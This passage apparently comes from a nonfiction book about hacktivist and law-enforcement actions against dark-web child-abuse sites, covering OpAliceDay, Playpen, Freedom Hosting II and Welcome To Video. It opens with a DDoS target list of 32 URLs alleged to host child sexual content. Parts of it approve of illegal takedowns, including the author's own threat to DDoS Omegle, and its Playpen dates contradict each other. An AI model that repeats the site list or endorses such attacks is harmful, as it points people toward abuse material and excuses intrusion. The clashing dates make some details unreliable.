 Defaces. Our primary goal is to take target #1 down and we won’t
stop firing until it is down.
1. http://imgsrc.ru
2. http://sexibl.com
3. http://motherless.com
4. http://onlyamatuer.com
5. http://jailbait-webcams.com
6. http://lsmodelclub.eu
7. http://youngangels.net
8. http://nn-bbs.info
9. http://art-models.info
10. http://annabelleigh.net
11. https://www.boychat.org
12. http://nambla.org
13. http://juxim.com
14. http://15yomodels.com
15. http://ttlmodels.com
16. http://xxsmodels.info
17. http://www.jblover.com
18. http://www.9to12.org
19. http://collection.world-collections.com
20. http://juniortaboo.info
21. http://free.top-dolls.net
22. http://teen.prettymodels18.com
23. http://freespirits.org
24. http://webcamhoring.com
25. http://teenfuckr.com
26. http://private-xxxphoto.net
27. http://www.lilnnhost.info
28. http://www.vote4nonude.info
29. http://www.realtinypics.com
30. http://www.onlynngirls.info
31. http://juniortease.info
32. http://jailbaitlovers.com

iMGSRC.RU was the top target, a Russian-hosted imageboard filled with

password-protected albums such as “boy Self pics” and “girls in the
bathroom.” Target No. 2 is a “free bookmarking & blogging platform” with
“sex” in the URL. Target No. 3 is a popular porn-streaming site with the
tagline “where anything legal stays” and the unfortunate reputation for lax
security measures against user-submitted underage content. (In talking to the
Anonymous source, this is the one he seemed most excited about taking
down.) Another is a North American Man-Boy Love Association page. Other
sites on the list include nauseating URLs with variations of “teen,” “junior,”
“models,” “9 to 12,” and “jailbait.”.

https://twitter.com/hashtag/opaliceday

NAMBLA—the North American Man/Boy Love Association and one of the

most prominent pedophilia advocacy groups—was one of the first to get hit,
leaving visitors the following message:

What @ReportAPedo said:

It was pretty much taking pedos websites down and spread
awareness about child abuse and child sexual abuse. Not many ppl
 pay attention to pedophiles but they are out there many of them. We
spend about 7 hours taking several websites down and after that
others Anons individually took down many other pedo websites. This
is not Legal but we agree their work against Child Porn.

Final Word
While the legitimacy of Anon's self-appointed police status often gets called
into question, this is at least one set of attacks nearly everyone can get
behind. Especially after the realization that “Alice Day” just so happens to
fall right in the middle of child abuse awareness month.
But not everyone was happy. A comment by a user whose signature image is
a drawing of a little girl in a dress, blowing bubbles in a field—sounds
scornful:
It’s very ironic how they [Anonymous] claim to be all for freedom of
expression on the internet, and, not just do they attack on us
pedophiles (how’s that being for freedom of expression, euh)? but in
general, all the attacks they conduct, ARE a form of censorship. So,
let me get this straight: you defend freedom of expression by
conducting acts of censorship?
 6
JUDGE, JURY, AND EXECUTIONER
The Hidden Wiki is the name used by several censorship-resistant wikis
operating as Tor hidden services that anyone can anonymously edit after
registering on the site. The main page serves as a directory to other .onion
websites. The earliest mention of the hidden wiki is from 2007 when it was
located at 6sxoyfb3h2nvok2d.onion. In March 2014 the site and its
kpvz7ki2v5agwt35.onion domain was hacked and redirected to Doxbin as a
response to the maintenance of pages dedicated to child pornography links,
specifically sections called “Hard Candy” and “Jailbait,” as child
pornography sites are usually called on the Dark Web. Following this event,
the content began to be mirrored to more locations.
Even today, the Hidden Wiki is the most popular site on the Dark Web,
serving as the essential start page for anyone searching onion links. Along
with anarchist message boards, hackers and hitmen for hire, and illicit
merchants selling cloned credit cards, counterfeit money, drugs, fake IDs,
guns, and even Rhino horns, the Hidden Wiki also once linked to sites
providing child porn. On March 7, 2014, The Hidden Wiki was hacked and
would never again have any “Hard Candy” or “Jailbait” links, as child
pornography sites are usually called on the Dark Web.
The Hidden Wiki was hijacked by a hacker known as Intangir, who operated
Doxbin at the time, a site that describes itself as “as judge, jury, and
executioner for all matters relating to Onionland.” In a message on the
Doxbin site, Intangir wrote that he'd support Hidden Wiki mirror sites that
“A. Don't link to child porn site and B. Allow community editing.”
Intangir said of the hack that “the opportunity presented itself, so it was
taken.” As to the decision to eliminate links to underage porn, Intangir said
that the goal was to do something good while showing that the Hidden Wiki
had terrible security. “In 1 move, I did more to limit CP [child porn] access
than all the Twitter pedo hunters of the last 3 years. What have you done
today?” Intangir posted on Twitter on March 11, 2014.
The hack also brought to the forefront an intrinsic tension in the fight against
censorship on Tor. Intangir added, “While child porn is a hard thing to
defend, the hack was rebutted by some hardline anti-censorship types who
argued on principle that any form of censorship is harmful.” For hardline
anti-censorship types “it's "about keeping Tor free” period.
Intangir planned to use his control of the main Hidden Wiki site, which was
the most visited site on Tor, as a bargaining chip to force Hidden Wiki clones
to remove child-porn links. “The Hidden Wiki had worse opsec [operations
security] than Dread Pirate Roberts, and I took its domain as a trophy,”
Intangir posted on Twitter. “I then let everyone sweat it out for a day and
used my control of THW [The Hidden Wiki] onion as a bargaining chip to
suppress CP links on HW [Hidden Wiki] clones.”
According to Intangir, the new head of the Hidden Wiki mirror (a duplicate,
or clone, with a different url, to serve as a backup) actually suggested that he
remove child-porn links in trade for ownership of the site. “As for the CP
links removal demand, I was going to issue demands and see what happened,
but he came to me and expressed a willingness to get rid of Hard Candy in
the initial e-mail,” Intangir wrote. “He wanted the private_key, but I wouldn't
give that up. It wasn't much of a negotiation, and he's even told me that he's
ok with our e-mails going public.”

Final Word
Still, some users were disappointed that even the Hidden Wiki could have
limits imposed. Intangir said he doesn't much care. “What I love about these
neckbeards complaining about censorship is that if someone put their dox up,
they would be filling up my inbox with things like 'TAKE THIS DOWN
INTERNET FREEDOM ETC' and I would just add the crying to their dox
and make fun of them,” he wrote. “If someone added a pro-NSA page to the
wiki, they would probably edit it or at least spam the talk page about having
it taken down, yet they're ok with cp links.”
 7
FBI: OPERATION PACIFIER
Playpen was the world's most notorious darknet child pornography website
(upf45jv3bziuctml.onion) after its creation in August 2014. When it was shut
down in February 2015, the site had over 215,000 users and hosted 23,000
sexually explicit images and videos of children.

“Operation Pacifier” also involved the FBI hijacking the site and continuing
to serve content for two weeks. During this time the FBI used a malware-
based "Network Investigative Technique" to hack into the web browsers of
users accessing the site, thereby revealing their identities. The investigation
was criticized by some because, after having taken control of the website, the
FBI continued to operate the website and thus distribute child pornography,
the same crime the bureau sought to stop.
Steven W. Chase, 58, of Naples, Florida, created Playpen in August 2014 on
the Tor network, an open network on the internet where users can
communicate anonymously through “hidden service” websites—where
criminal activity is not uncommon. Chase ran the Playpen website, where
members uploaded and viewed tens of thousands of postings of young
victims, indexed by age, sex, and the type of sexual activity involved.

Steven W. Chase, 58, of Naples, Florida, was sentenced to 30 years on multiple child- pornography and
child-exploitation charges in May 2017. Chase lived in a rural-suburban neighborhood in Naples,
Florida. According to public records, he ran an excavation trucking company. Chase had been charged
with a few crimes in Naples over the years, including battery and possession of a controlled substance,
but those charges were dismissed.

The case opened shortly after Steven Chase launched Playpen in the summer
of 2014. The FBI, which has numerous investigations involving the Dark
Web, quickly became aware of the site, but “given the nature of how Tor
hidden services work, there was not much we could do about it,” Alfin
recalled. That is, until December 2014, when Chase slipped up and revealed
Playpen’s unique IP address—a location in the U.S. The gaffe was noticed by
a foreign law enforcement agency, which notified the FBI.
“From that point we took normal investigative steps—seized a copy of the
website, served search warrants for e-mail accounts, followed the money—
and everything led back to Steven Chase,” said Alfin. Chase was sentenced in
May 2017 in connection with engaging in a child exploitation enterprise and
multiple child pornography charges. His sentencing follows those of two co-
defendants who were also administrators on the website—Michael Fluckiger,
46, of Indiana, and David Browning, 47, of Kentucky—who were each given
20-year prison terms earlier this year.

Arresting Playpen’s administrators, however, was only the beginning. In

January 2015, the FBI, in partnership with the Department of Justice Child
Exploitation and Obscenity Section, launched Operation Pacifier—an effort
to go after Playpen’s thousands of members. Using a court-approved network
investigative technique, agents uncovered IP addresses and other information
that helped locate and identify users. Investigators sent more than 1,000 leads
to FBI field offices around the country and thousands more to overseas
partners, Alfin said.
The case—and the thousands of follow-up investigations it has launched—is
unprecedented in its scope and reach, FBI officials said. It represents the
Bureau’s most successful effort to date against users of Tor’s hidden service
sites. And it has opened new avenues for international cooperation in efforts
to prosecute child abusers around the world.
Arrests and other enforcement actions have occurred in countries far and
near. Europol, the European Union's agency for law enforcement
cooperation , reported arrests, along with Israel, Turkey, Peru, Malaysia,
Chile, and the Ukraine. International agencies critical to the investigation
included CNCPO Polizia Postale e Comunicazioni of Italian State Police ,
the United Kingdom’s National Crime Agency, and New Zealand's
Department of Internal Affairs.
Even some countries where law enforcement cooperation has been
historically limited were, in this case, especially helpful in pursuing the FBI’s
leads on former users and contributors to Chase’s Playpen site.
“Members of his enterprise who were raping children, who were producing
child pornography all around the world—those cases continue to be indicted
and prosecuted,” Alfin said.
In addition to taking down the website, the investigation, as of May 4, 2017,
has produced these results: at least 350 U.S. individuals arrested; 25
producers of child pornography prosecuted; 51 hands-on abusers prosecuted;
55 U.S. children successfully identified or rescued; 548 international arrests,
with 296 sexually abused children identified or rescued.
But the FBI didn’t just shut Playpen down. Instead, the FBI operated the site
for nearly two weeks, allowing thousands of images of child pornography to
be downloaded—a federal crime, which carries steep penalties. That decision
has spurred serious debate because it could end up having a lasting impact on
our digital rights.
While the FBI was running Playpen, it began sending malware to visitors of
the site, exploiting a vulnerability in Firefox bundled in the Tor browser. The
government, in an effort to downplay the intrusiveness of its technique,
euphemistically calls the malware it used an “NIT”—short for “Network
Investigative Technique.” The NIT copied certain identifying information
from a user’s computer and sent it back to the FBI in Alexandria, Virginia.
Over a thousand computers, located around the world, were searched in this
way—some say illegally searched.
A Network Investigative Technique, or NIT, is a term used exclusively by the
U.S. government to refer to the methods or tools it uses to access computers
of individuals that have taken steps to obscure or mask certain identifying
information, like an IP address. An NIT or Network Investigation Technique
is simply a label the government uses to describe the memory-resident
malware it used in this and other investigations. It is simply a term coined by
the FBI. It has no technical meaning. Instead, the FBI chose an acronym
meant to minimize the appearance of intrusiveness of its tool. However,
rebranding the tools the FBI uses to conduct its hacking does not alter the
intrusiveness of or legal consequences that should follow these hacking
practices.
In the Playpen investigation, the NIT used by the government is malware that
was surreptitiously disseminated through a Tor hidden service. The malware
was designed to pierce the anonymity provided by the Tor network by
exploiting a vulnerability in the Firefox web browser (running as part of the
Tor Browser) to place computer code on users’ computers that would
transmit private information back to a law enforcement server. The initial
exploit code downloaded the rest of the NIT malware which then copied
certain identifying information from the computer and sent that information
back to the FBI without encrypting the data.
The malware used in the Playpen investigation can be thought of as being
composed of at least three critical parts:
1) a generator, running on the hidden service, which created a unique
ID for each deployment and transmitted the ID, exploit, and payload;
2) the exploit that took advantage of the vulnerability in the user’s
software, allowing access to the user’s device; and
3) the payload that copied information from a user’s device and then
sent that information back to the FBI unencrypted and
 unauthenticated via the internet.
This is the most extensive use of malware a U.S. law enforcement agency has
ever employed in a domestic criminal investigation. And, to top it all off, all
of the hacking was done on the basis of a single warrant.
The government has arrested and charged hundreds of suspects as a result of
the investigation. Now defendants are pushing back, challenging the tenuous
legal basis for the FBI’s warrant and its refusal to disclose exactly how its
malware operated. Some courts have upheld the FBI’s actions that, if
ultimately upheld, threaten to undermine individuals’ constitutional privacy
protections in personal computers.
What is alarming digital privacy advocates is that it was a single warrant,
issued in the Eastern District of the US state of Virginia, but the FBI used it
to justify the worldwide hacking of computers to identify tens of thousands of
people who wandered into its honeypot. It is this kind of mass surveillance by
the FBI that is unsettling to so many.
In a closely watched, potentially pivotal case, a judge has said that the
warrant was unconstitutional. He’s recommending that reams of evidence
collected under the warrant be considered inadmissible in hundreds of
criminal cases against Tor users suspected of trafficking in child abuse
imagery on Playpen.
Is it right that the FBI ran Playpen for 13 days, from February 20 to March 4,
2014, serving up illegal child abuse imagery with the blessings of a US court
and the resources of the US government?
According to court documents in a related case, the FBI used an NIT—what’s
also known as police malware—to force more than 8,000 computers that
visited Playpen to divulge their IP addresses, MAC addresses; open ports;
lists of running programs; operating system types, versions and serial
numbers; preferred browsers and versions; registered owners and registered
company names; current logged-in user names; and their last-visited URL. It
was a massive haul of evidence, and it led to the arrests of nearly 900 people
worldwide.
As is becoming ever more clear as cases wind their way through the courts, it
was a fishing expedition, with the FBI using the warrant to find suspects to
identify. That’s not how warrants are supposed to work. Rather, they’re
supposed to be issued with a specific scope, with a specific target, and
whatever government agency requested the warrant is supposed to investigate
based on what the warrant turns up.
One Playpen case concerns that of Terry Lee Carlson, a 47-year-old from
Minnesota, who was arrested following the FBI’s Operation Pacifier. A
federal magistrate judge in Minneapolis, Minnesota, has recommended that
evidence seized in Carlson’s home—including 20 storage drives—be
suppressed. There’s no way that the Eastern Virginia magistrate judge who
issued the NIT warrant had jurisdiction to have it span the entire planet, US
Magistrate Judge Franklin Noel wrote in a decision filed at the end of March.
Noel quoted District Judge Robert J Bryan, who in an earlier, related case
noted that the FBI didn’t just hack into 120 countries and territories outside
the US—it also hacked into a “satellite provider,” meaning that “now we are
into outer space as well.”
From Noel’s decision:
Stated differently, the Government claims legal authority from this
single warrant, issued in the Eastern District of Virginia, to hack
thousands of computers in 120 countries and to install malicious
software for the purpose of investigating and searching the private
property of uncounted individuals whose identities and crimes were
unknown to the Government before launching this massive
worldwide search.
Even if the government could legally explain the use of the warrant, the
evidence would still be inadmissible, given that the data collected by the NIT
wasn’t covered under the warrant in the first place, he wrote:
This Court is aware of no lawful way for the Government to deploy
this investigative technique. Assuming without deciding that some
way could be devised to use the technology employed here, the Court
concludes that the Government, by using the NIT malware to collect
data from Carlson’s activating computer conducted an unlawful
search that was not supported by a lawful warrant.
Noel had little good to say about the FBI’s use of malware and its decision to
keep Playpen up and running for two weeks after it had arrested the site’s
creator:
The purpose and flagrancy of the FBI’s misconduct in attempting to
obtain the NIT warrant and deploying the NIT malware is truly
staggering.
In order to identify Playpen users, the FBI operated a copied version
of a dark web, child pornography website for two weeks. During that
period, countless images and video content depicting child
pornography were globally downloaded and distributed via the
Playpen.

In essence, the FBI facilitated the victimization of minor children

and furthered the commission of a more serious crime—the
distribution of child pornography to primarily identify offenders
committing less serious crimes: viewing and receipt of child
pornography.

Final Word
Right from the start, this case has raised conflicting impulses: on the one
hand, we want to give the FBI a pat on the back for a job well done when it
comes to catching people involved in child abuse. On the other hand, Judge
Noel is right: it wasn’t a job well done. By far exceeding the terms of the
search warrant, the investigators themselves trampled privacy rights.
It’s simply not OK to break the law in order to catch criminals. But more
concerning is that once law enforcement gets away with using a single search
warrant to employ “police malware” to conduct mass surveillance in a child
abuse case, what’s to stop law enforcement from doing the same thing in
other “ordinary” cases? What is to stop law enforcement from infecting your
computer with “police malware” simply because you visit a website that is
under investigation?
Most people would argue that the people using Playpen were there solely for
the purpose of seeing, downloading, or uploading child porn, so that makes
their privacy concerns invalid. But the fear among privacy advocates is that
once law enforcement goes down the path utilizing a “police malware” in a
child abuse case, eventually it will become standard practice is a wide variety
of cases, resulting in thousands—maybe millions—of people having their
privacy violated, simple because they visited a website.
 8
FREEDOM HOSTING II DDOSED
In February 2017, Freedom Hosting II, a site with 10,613 websites on the
Dark Web, was attacked after a hacker said child pornography was being
hosted on the websites. The first and original Freedom Hosting was also
hacked and DDoSed by Anonymous in 2011, as part of Operation Darknet,
for the same reasons of hosting child pornography portals. In 2013, the FBI
used a misconfiguration in the Tor Browser setup to identify visitors to these
sites. The FB later took down the service and arrested its founder, Eric
Marques, the so-called "Kingpin of Child Porn." At that time, the first
Freedom Hosting hosted around half of all Dark Web URLs. This time,
around 20 percent of all websites on the Dark Web were taken offline in the
hack.
Freedom Hosting II made it easy for people to create an anonymous site on
the Dark Web but in doing so created a huge vulnerability. Both Freedom
Hosting and Freedom Hosting II were hacked, crashing 50% and 20% of all
Dark Web sites, respectively. Daniel Hosting—which became popular after
Freedom Hosting II went down—was also hacked in March 2020, crashing
the 7600 sites it hosted. Web hosts are simply ridiculously hard to secure on
the Dark Web.
On February 3, 2017, visitors to any of the websites hosted by the firm saw
the message: “Hello, Freedom Hosting II, you have been hacked. “The
statement explained that when the attacker was searching through Freedom
Hosting II's database, they found 50 percent of websites were “child porn”
noting, “you host many scam sites.”
The hackers stole around 75GB of files and 2.6 GB of databases. Initially, the
hackers asked for 0.1 BTC for the stolen files, but then released the master
database files for free. The next day they also released the system files as
well as a statement about how the hack was done.
 Anonymous hackers initially asked for 0.1 BTC for the stolen files.

The second version of the defacement message.

Despite the hackers receiving two payments in their Bitcoin wallet, they later
decided to dump the data publicly, which was made available for download
as torrent files. The 2.6 GB MySQL database included 381,000 email
addresses. Law enforcement and intelligence agencies certainly downloaded
the very public data. No doubt, there are clues as to who operated each site
within the Freedom Hosting II data. But it is also likely the database of
leaked email addresses affected those who use the anonymous browsing
method for legitimate purposes, such as human rights activists and journalists
in countries with oppressive regimes.
Since all websites were interconnected by Freedom Hosting II's underlying
infrastructure, all sites have been defaced with the same message. In the
defacement message, the Anonymous hackers also left a list of all 10,613
hacked sites, which can be found at:
https://onionscan.org/fhosting-sites.txt
According to the message the hackers put on the site, they found massive
troves of child pornography imagery hosted on the company's servers. The
hackers claimed child pornography made up more than half the data stored on
the servers, claiming to have found 10 child pornography sites with
approximately 30GB of files.
The hackers said they first compromised the service on January 30, but only
had read access; meaning they couldn't change or delete files, but just see
what sites were hosted. “Initially I didn't want to take down FH2, just look
through it," the hacker said in an email. But they found several large child
pornography sites which were using more than Freedom Hosting II's stated
quota of 256MB per site. “This suggests they paid for hosting and the admin
knew of those sites. That's when I decided to take it down instead,” the
hacker said.
As for how they allegedly did it, the hacker has laid out a relatively simple 21
step process. In short, it starts by creating a new Freedom Hosting II site or
logging into a current one, tweaking some settings in a configuration file,
manually triggering a password reset for a target, turning on root access, and
then logging back in with your new system privileges.
 How Freedom Hosting II was hacked

Final Word
Law enforcement, however, probably wasn’t all that pleased. In recent years,
when law enforcement agencies such as the FBI have taken over Dark Web
sites or hosting providers, they have then tried to identify individual users by
deploying malware. The FBI did this with the original Freedom Hosting and
Playpen sites, using a hacking tool to grab visitors’ IP addresses. They used
this tactic because even when in control of a Tor hidden service, law
enforcement typically can't see where each user is connecting from. But when
the plethora of Freedom Hosting II child pornography sites shut down, it
meant the FBI might wasn’t able to use that sort of tactic at all.
Additionally, taking down all 10,613 sites was seen as a major blow by
many, considering many were personal or political blogs and forums.
So, was it a good hack?
 9
WELCOME TO VIDEO
The hacktivist group Anonymous has actively shut down numerous illegal
websites on the Dark Web, especially child pornography sites. But there are
critics of Anonymous’ activity. Experts routinely condemn Anonymous
saying they impede ongoing investigations and destroy evidence.
Christian Sjoberg, boss of image analysis firm NetClean which helps police
forces categorize images of abuse, said while taking down child porn sites
was commendable, hackers should think twice before they act. “It could be
dangerous,” he said, "because if it’s a big host the police will definitely know
about it. If you think of these images as evidence of a crime that's published
on the internet then the picture gets a bit more complicated,” he said.
Graham Cluley, senior technology consultant at security firm Sophos, said
the attacks were misguided. “Take-downs of illegal websites and sharing
networks should be done by the authorities, not net vigilantes,” he said. “The
attacks could have put an existing investigation at risk, stopped the police
from gathering evidence they need to prosecute, or made it difficult to argue
that evidence has not been corrupted,” Cluley said. “The Anonymous hackers
may feel they have done the right thing, but they may actually have
inadvertently put more children at risk through their actions.”
And in at least one major case involving the child abuse site “Welcome To
Video,” the IRS and Homeland Security Investigations unit had already
launched an investigating after receiving an anonymous tip about a security
flaw, two months before a hacker group discovered the same security flaw
and reported it to a journalist at ZDNet. Named Zack Whittaker. Of course,
the hackers nor Whittaker had any idea that Welcome To Video was already
under investigation by law enforcement. Whittaker decided to report the
security flaw to the FBI and not run a story. Afterward, Whittaker heard
nothing from the FBI. When he followed up, the agent warned that if the site
became—or was already—subject to investigation, there was little, if
anything, they could say.
But it was the right decision. A little over a year later, the Justice Department
announced that it had brought charges against the administrator and hundreds
of users of the “world’s largest” child sexual exploitation marketplace on the
Dark Web. Had Whittaker wrote the story earlier, the owners would have
shut down the site, took their bitcoins, and disappeared.
The World's “Largest Dark Web Child Porn Marketplace”
Welcome To Video launched by 23-year-old Jong Woo Son of South Korea
in June 2015 and operated until law enforcement shut it down in March 2018.
The Internal Revenue Service Criminal Investigation and Homeland Security
Investigations collaborated with South Korean and UK officials in the
investigation.
Officials seized 8 terabytes of child porn videos during the investigation and
site takedown, which included more than 250,000 unique videos. About 45
percent of the videos analyzed by the National Center for Missing and
Exploited Children contain new images that have not been previously known
to exist.
Anyone could create a free account. They could download the videos if they
paid in bitcoin, or if they earned points by referring new customers, or
uploading their own unique videos. The site sought only child pornography—
its homepage stated in red bold type: “Do not upload adult porn.” Users could
purchase videos using cryptocurrency and an annual membership was priced
at 0.03 bitcoins—around $300 at the time.
Welcome To Video made money by charging fees in bitcoin, and gave each
user a unique bitcoin wallet address when they created a new account. Jong
Woo Son operated Welcome To Video as a Tor hidden service on the Dark
Web But Jong Woo Son and others made mistakes that allowed law
enforcement to track them. A very basic assessment of the Welcome To
Video website revealed two unconcealed IP addresses that were managed by
a South Korean internet service provider and assigned to an account that
provided service to Son’s home address. When agents searched Son's
residence, they found the server running Welcome To Video.
This message was posted on "Welcome To Video" after it was seized by U.S. authorities in March 2018.
Investigators started to piece together the site operator's identity in September 2017 when the
homepage source code revealed two IP addresses from which the site was operating. They were traced
back to a telecommunications provider in South Korea, and both IP addresses were also registered to
23-year-old Jong Woo Son. He had been running the operation from his residence in South Korea since
2015.

Federal agents began investigating the site in September 2017, two months
before a group of hacktivists breached the site. The main landing page to the
site contained a security flaw that let investigators discover some of the IP
addresses of the site—simply by right-clicking the page and viewing the
source of the website. It was a major error, one that would trigger a chain of
events that would ensnare the entire site and its users.
The IP addresses in the indictment were on the same network as the IP address provided by the hackers
to journalist Zack Whittaker.

Welcome To Video was selling the videos in exchange for bitcoin, making it
among the first Dark Web websites to monetize child exploitation videos
using the cryptocurrency. From about June 2015 to March 2018, Welcome
To Video received at least 420 bitcoin through 7,300 transactions with users
in numerous countries including the US, the UK, and South Korea. Those
transactions were worth over $370,000 at the time. However, those
transactions would ultimately help bring about the site's collapse.
The site itself boasted over one million downloads of child exploitation
videos by users. An analysis of the server revealed that the website had more
than one million Bitcoin addresses, signifying that it had audacious goal of
reaching one million users.
The FBI was not involved in the investigation. The Internal Revenue
Service’s Criminal Investigation division, which investigates and prosecutes
financial crimes, and the Homeland Security Investigations unit, which
largely deals with human smuggling, child trafficking, and related computer
crimes, were credited with the work. While authorities from the U.K. and
South Korea contributed to the investigation, sources say the IRS received an
anonymous tip that kickstarted it. From there, the IRS used technology to
trace bitcoin transactions, which the Dark Web site used to profit from the
child exploitation videos. Users would have to pay in bitcoin to download
content or upload their own child exploitation videos.

Welcome To Video screenshot, March 13, 2015. Source: Justice Department

The takedown of Welcome To Video is notable because the investigation

focused not on offensive hacking efforts or surveilling encrypted
communications—as the FBI did in the takedown of Playpen—but on tracing
bitcoin transactions. To “follow the money” law enforcement agents sent
relatively small amounts of bitcoin—roughly equivalent at the time to $125
to $290—to the bitcoin wallets Welcome To Video listed for payments. Since
the bitcoin blockchain leaves all transactions visible and verifiable, law
enforcement agents could observe the currency in these wallets being
transferred to another wallet. Law enforcement learned from a bitcoin
exchange that the second wallet was registered to Jong Woo Son with his
personal phone number and one of his personal email addresses.
The investigation extended beyond Son as well. Law enforcement agents
worked with the blockchain analysis firm Chainalysis to map user
transactions with Welcome To Video wallets and attempt to trace individuals
who interacted with the site. Chainalysis says that during the three years it
operated, Welcome To Video received $353,000 in bitcoin from thousands of
transactions. By charting the web of Welcome To Video users' assigned
wallets and the bitcoin wallets or exchanges they used, officials identified
several US-based cryptocurrency exchanges that users had gone through to
pay for their Welcome To Video viewing. US law requires cryptocurrency
exchanges to collect customer information and verify their identities,
meaning law enforcement can subpoena cryptocurrency exchanges for these
records.
Law enforcement discovered that the virtual currency accounts identified
were used by 24 individuals in five countries to fund the website and promote
the exploitation of children. A forfeiture complaint seeks to recover these
funds and, ultimately through the restoration process, return the illicit funds
to victims of the crime.
Simply put, Son and many Welcome To Video users were sloppy enough that
investigators could connect them to their Dark Web activity with relative
ease. And particularly, investigators gained insight into the platform's users
when they seized Son's server. Similarly, the investigation does not seem to
have hinged on access to Son or other users’ digital communications other
than emails. In this case, the government relied on various techniques to
successfully identify site operators and seize the server, giving them a
window into user activity. Privacy advocates point out that no form of end-to-
end encryption prevents law enforcement from reading communications if
they have access to one of the ends, nor is it necessary for law enforcement to
use a Network Investigative Technique, as the FBI did in the Playpen case.

Final Word
In September 2017, authorities did something simple: they right-clicked on
Welcome To Video's homepage and selected "view page source." When they
did that, they discovered an unconcealed IP address. That IP address and
another found in the same way in October 2017 were both traced to a
residential address in South Korea—to a 23-year-old South Korean operating
a global child exploitation site from his bedroom. He was arrested in South
Korea and found guilty of producing and distributing child pornography, a
charge that carries a possible 10-year jail term under South Korean law. In
May 2019, he was sentenced to 18 months in jail. But Son could still face
more prison time. In August of 2018, Son was indicted on a number of child
pornography charges in the US, including advertising child pornography
which carries a possible 30-year sentence.
Many Welcome To Video users likely thought they were untraceable but in
total, 337 people from at least 18 countries—223 from South Korea—who
used Welcome To Video have been arrested and charged.
While bitcoin has a reputation among the general public for secrecy, the
reality is a bit different. Each time bitcoin is transferred, details of the trade
are recorded on a publicly available, permanent ledger. It's therefore possible
to see what an individual is doing, even you can't see their real-world
identity. There are also other holes in bitcoin's ability to maintain anonymity.
In the US, virtual currency exchanges—the platforms where people can buy
and sell bitcoin for real money—are required by law to verify their
customers’ real-world identities. Developed countries are increasingly
adopting those measures, too. This all means that bitcoin isn't really
anonymous—it's pseudonymous. For law enforcement agents, the difficulty
isn't seeing the transactions —it's linking the bitcoin account with the real-
world person behind them. And over the past year, tools that can analyze
bitcoin transactions have developed to a high level.
In the US. one user, Nicholas Stengel, of Washington, D.C., pleaded guilty to
child porn charges in late 2018 and was sentenced to 15 years in prison.
Prosecutors said that he alone downloaded more than 50 years of abuse
videos. In April 2019, Mark Rohrer, a man from West Hartford, Connecticut,
was sentenced to five years in prison after pleading guilty in September 2018
to similar charges. Other defendants include Richard Gratkowski, a former
Homeland Security Investigations agent, who pleaded guilty and was
sentenced to 70 months in prison back in May 2019. According to the FBI,
Gratkowski used Coinbase, a well-known online wallet company, with his
own government passport as identification. Also in May 2019, across the
country in Rhode Island, an Army veteran named Stephen P. Langlois was
sentenced to 42 months in prison for downloading 114 videos from the site.
A Texas defendant, Michael Ezeagbor, pleaded guilty earlier this year to
downloading 42 videos and uploading 10 videos.
The good news in this case, is that at least 23 children in the US, Spain, and
the United Kingdom who were being abused by the users of the site have
been rescued. “Children around the world are safer because of the actions
taken by US and foreign law enforcement to prosecute this case and recover
funds for victims,” said Jessie K. Liu, an attorney for District of Columbia
where the US case was filed. “We will continue to pursue such criminals on
and off the darknet in the United States and abroad, to ensure they receive the
punishment their terrible crimes deserve.”
 10
OMEGLE: TALK TO STRANGERS PREDATORS
In 2018, I finished a 4 hour and 35 minute documentary called “The Secret
Story of 9/11” that I had been working on for years. In the documentary, I
analyzed about 30 hours of real-time audio recordings—the 9/11 Tapes—as
the 9/11 terrorist attacks unfolded. Essentially, the 9/11 Tapes provide an
accurate and comprehensive timeline of the events on that fateful morning. I
became captivated, even obsessed, with the 9/11 Tapes because I needed to
know if there was any truth at all to the plethora of conspiracy theories that
emerged in the immediate aftermath of 9/11. Advocates who were preaching
9/11 conspiracy theories sounded very convincing. However, my research
ultimately led me to believe that the vast majority of 9/11 conspiracy theories
were false, misleading, and even fraudulent. Later, I would write The Secret
Story of 9/11, largely based on the documentary, exposing the multitude of
spurious 9/11 conspiracy theories.
Not only am I avid researcher of 9/11 conspiracy theories, but also an
investigator of other specious conspiracy theories, too—and there are many.
Currently, I’m writing a book called, “Conspiracy Theory Nation,” which is
an investigation into several widespread conspiracy theories, and the reasons
why people are beguiled and enthralled with them.
But more than a researcher of conspiracy theories, I’m a “niche topic internet
researcher.” In fact, prior to creating the documentary The Secret Story of
9/11, I did a couple of other documentaries. The first was on the hacktivist
group Anonymous, while the second was about one of the most dangerous
social media websites on the internet: Omegle.
The headline on Omegle’s homepage is “Talk to strangers,” with the caveat,
“Predators have been known to use Omegle so please be careful.”
There is an interesting story about the warning, “Predators have been known
to use Omegle.” Omegle added that warning after I sent Omegle a copy of
the documentary I was working on, which had dozens of video clips of
children using Omegle engaged in sexually explicit chats with “Strangers.” I
also showed that by using a free and open-source software called Wireshark,
and with a few other tools I was able to capture their IP address and other
identifying information.
My Omegle documentary exposed Omegle as a blatant child porn site. I sent
the documentary to Omegle in the middle of 2015, with the omen that not
only would the documentary be sent to certain media personalities who are
known to abhor child porn on the internet, but also warned that Anonymous
would engage in a relentless DDoS attack on Omegle’s servers—if Omegle
didn’t take immediate steps to prevent children from using Omegle and warn
users that Omegle was used by Predators.
Within a few weeks, the text “Predators have been known to use Omegle”
was added to Omegle’s homepage, as shown in the two screenshots below.
The first screenshot was taken on June 2, 2015 (it had no warning about
Predators). The second screenshot was taken a month later, and the warning,
“Predators have been known to use Omegle,” magically appears.

